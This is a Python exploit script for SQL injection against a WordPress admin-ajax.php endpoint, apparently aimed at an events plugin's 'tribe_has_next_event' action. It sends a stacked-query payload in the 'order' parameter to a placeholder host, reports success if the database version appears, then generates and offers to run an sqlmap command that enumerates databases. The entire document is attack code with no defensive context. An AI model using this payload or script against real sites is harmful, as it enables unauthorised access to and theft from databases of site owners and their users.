import requests
import os

url = "http://vulnerable-site.com/wp-admin/admin-ajax.php"

payload = {
    "action": "tribe_has_next_event",
    "order": "ASC; SELECT @@version--"
}

try:
    response = requests.get(url, params=payload)

    if response.status_code == 200 and "version" in response.text:
        print("[+] Vulnerability Exploited Successfully!")
        print("Extracted Database Version: ", response.text)

        sqlmap_command = f"sqlmap -u \"{url}\" --data \"action=tribe_has_next_event&order=ASC\" --dbs --batch"
        print("\n[+] Generated sqlmap command:")
        print(sqlmap_command)

        run_sqlmap = input("\nDo you want to run the sqlmap command? (yes/no): ").lower()
        if run_sqlmap == "yes":
            os.system(sqlmap_command)
        else:
            print("You can copy and paste the command to run manually.")

    else:
        print("[-] Exploit failed or target not vulnerable.")

except Exception as e:
    print("[-] An error occurred while attempting the exploit.")
    print(f"Error: {e}")